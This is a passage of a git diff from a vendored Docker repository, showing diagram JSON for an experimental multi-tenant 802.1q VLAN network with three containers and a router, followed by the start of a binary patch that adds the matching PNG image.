.0,"id":115,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":29,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":116,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":17,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":117,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":26,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887324033,-1.055138662316466],[1.3318647887324033,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":118,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":119,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":120,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":121,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container1 - vlan10</span></span></p><p style=\"text-align:center;\"><span style=\"\">192.168.1.2/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.0,"y":82.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"text-decoration:none;font-family:Arial;font-size:12px;\"><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":4.1999969482421875,"rotation":0.0,"id":187,"width":108.99999999999999,"height":19.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0 - 802.1q trunk</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":282.0,"y":8.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":32,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":55.0,"rotation":0.0,"id":210,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-8.0,11.0],[-8.0,34.0],[26.0,34.0],[26.0,57.0]],"lockSegments":{},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":12.805718530101615,"y":11.940280333547719,"rotation":0.0,"id":134,"width":59.31028146989837,"height":83.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":35,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":64.0,"y":73.19999694824219,"rotation":0.0,"id":211,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0.10</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":52.19999694824219,"rotation":0.0,"id":212,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0.20</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.386363636363733,"y":108.14285409109937,"rotation":0.0,"id":219,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":139.1475672215109,"y":139.96785409109907,"rotation":0.0,"id":227,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":55,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":228,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":43,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":229,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":52,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":232,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":232,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":230,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":231,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":46,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":232,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":41,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":233,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":54,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container2 - vlan20</span></span></p><p style=\"text-align:center;\"><span style=\"\">172.16.1.2/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":259.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":248,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":56,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":265.14756722151094,"y":139.96785409109907,"rotation":0.0,"id":241,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":73,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":242,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":61,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":243,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":70,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":246,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":244,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":67,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":245,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":246,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":59,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":247,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":72,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container3 - vlan30</span></span></p><p style=\"text-align:center;\"><span style=\"\">10.1.1.2/16</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":31.199996948242188,"rotation":0.0,"id":253,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":74,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0.30</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.49612211422149,"y":17.874999999999943,"rotation":0.0,"id":266,"width":275.00609168449375,"height":15.70000000000006,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":75,"lockAspectRatio":false,"lockShape":false,"children":[{"x":68.50387788577851,"y":43.12500000000006,"rotation":0.0,"id":258,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-31.924999999999997],[197.00221379871527,-31.925000000000153]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.50387788577851,"y":38.55333333333314,"rotation":0.0,"id":262,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":40.7533333333331,"rotation":0.0,"id":261,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":5,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":42.88666666666643,"rotation":0.0,"id":260,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":73.50387788577851,"y":43.95333333333309,"rotation":0.0,"id":259,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#ffe599","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":248.0,"y":51.19999694824219,"rotation":0.0,"id":207,"width":143.0,"height":70.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:left;\"><span style=\"\">Network Router (gateway)</span></p><p style=\"text-align:left;\"><span style=\"\">vlan10 - 192.168.1.1/24</span></p><p style=\"text-align:left;\"><span style=\"\">vlan20 -&nbsp;</span><span style=\"\">172.16.1.1/24</span></p><p style=\"text-align:left;\"><span style=\"\">vlan30 -&nbsp;</span><span style=\"\">10.1.1.1/16</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":88.19999694824219,"rotation":0.0,"id":272,"width":77.99999999999999,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":76,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Docker Host</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":80}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#e06666","strokeWidth":2,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457586821719,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png
new file mode 100644
index 0000000000000000000000000000000000000000..a38633cdbc23014364bfc611d650b2a17dc72ae0
GIT binary patch
literal 17879
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
